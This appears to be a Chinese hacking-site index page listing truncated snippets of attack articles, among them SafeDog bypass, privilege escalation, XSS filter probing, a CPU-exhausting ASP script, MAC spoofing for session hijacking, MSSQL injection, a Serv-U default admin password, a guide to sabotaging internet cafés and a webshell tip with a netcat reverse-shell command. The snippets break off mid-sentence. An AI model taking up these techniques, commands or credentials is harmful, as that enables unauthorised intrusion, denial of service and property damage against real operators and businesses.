入侵防御

这篇叙述性较强的日志文献将全程记录这次渗透，不管成败如何。我将站在教程的角度去表述。希望给大家完整的渗透入侵的感觉。 —————————R...

上次发了安全狗下加用户的另一方法，据说不够风骚…所以这次要淫荡一点 方法同样很简单，不过不知道有没有人发过。。PS: 转载请不要注明作者 0×01 测试环境： 安全狗的进程： .安全狗的服务 .开启远程桌面守护 .远程登录测试...

服务器权限提升简称提权，是指由原本的80端口低权限例如普通network权限提升至System权限，进而得到服务器的所有控制权。 提权大致分为三种类型，分别是： 1，堆栈溢出执行任意代码； 2，利用现有运行的system权限的软件； 3，通过社会工程学...

我先拿SOHU BLOG做示范. 1.测试过滤字符,下面都是构造XSS所需要的关键字符(未包含全角字符,空格是个TABLE,\\/前是真正的空格),在个人档案处看过滤了哪些. ’’;:!–"<javascript JAvaS...

原理就是通过执行死循环导致cpu跑满，不得不重启服务器，windows系统下可以通过停止w3wp.exe的方法解决，然后重启iis什么的把下面的代码保存为chongqi.asp，然后在访问，会占用CPU很高，管理员会重启。 复制代码 代码如下: <...

尽管为服务器设计软件的软件工程师们想方设法提高系统的安全性，然而由于系统管理员的水平参差不齐或安全意识底下，往往给黑客提供了入侵的机会。 　　其实每一个黑客都有自己独到的方法。笔者对于入侵网站服务器的资料收集了很多，但是因为实际情况的不同，往往造成许多...

ARP欺骗的攻击和防御技术都比较成熟了，这里也不再阐述。此次重点讲解如何不用ARP欺骗进行嗅探以及会话劫持的技术原理，实际的攻击方法是进行MAC欺骗。 　　一、原理： 　　在开始之前我们先简单了解一下交换机转发过程：交换机的一个端口收到一个数据帧时，首...

一、MSSQL获取数据： 用的比较多的就是for xml raw了，MSSQL2000都支持的！ 注入中显示数据的两个办法均可以使用，一是union select、二是显错，以MSSQL2005为例： 复制代码 代码如下: select usernam...

适用环境：服务器禁用FSO，关掉Wscript.shelll,没有执行权限。 限制：没有更改管理员的密码，或者破解出了Serv-U的管理员的密码。Serv-U默认用户名：localadministrator 密码：#|@$ak#.|k;0@p 下面用M...

首先，我们了解被破坏网吧的客观环境，要了解网吧人员的实地监测等。尤其要注意看有没有闭路电视监控。如果网吧人员对你的个人资料相当熟悉，就住手免的惹麻烦了。部分网吧要出示身份证也不要破坏了，免的惹麻烦。以下破坏方法不分先后，请量力灵活运用若干破坏组合。具体...

同学给我介绍了一个电子商务网站，因为自己读的就是电子商务专业，加上对网络安全比较感兴趣，所以看了这样的好网站，当然要帮忙测试下网络安全啦，首先做下常见端口扫描，咦，有状况…… 6129端口开了，6129是上段时间在网上比较流...

webshell提权小技巧 cmd路径: c:\\windows\\temp\\cmd.exe nc也在同目录下 例如反弹cmdshell： "c:\\windows\\temp\\nc.exe -vv ip 999 -e c:\\windo...